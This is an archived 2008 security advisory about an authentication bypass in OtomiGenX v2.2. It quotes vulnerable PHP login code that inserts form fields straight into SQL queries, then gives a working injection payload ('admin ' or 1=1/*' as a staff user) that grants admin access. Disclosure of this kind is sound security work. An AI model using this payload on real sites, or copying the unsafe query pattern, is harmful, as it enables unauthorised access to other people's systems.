Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability

ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

New vulnerabilities in Power Phlogger

From:	hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:	02.06.2008
Subject:	OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability

#################################################################################
#####
#                                                                                  
  #
#  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #           
#################################################################################
#####

Virangar Security Team

www.virangar.net
www.virangar.ir
--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
----------------
                               .::::admin Authentication bypass vuln::::.
//vuln code in login.php:
...
..
...
line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password

if($_POST[userType] != 'Staff')
{$sql     = "SELECT userID, userName
            FROM user_account
            WHERE userAccount='$_POST[userAccount]' AND
                    userPassword='$passwd' AND
                    userType='$_POST[userType]' AND isApproved='1'";

}else
$sql      = "SELECT staffID, staffName, staffGroupID
            FROM staff
            WHERE staffAccount='$_POST[userAccount]' AND
                    staffPassword='$passwd'";
...


-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------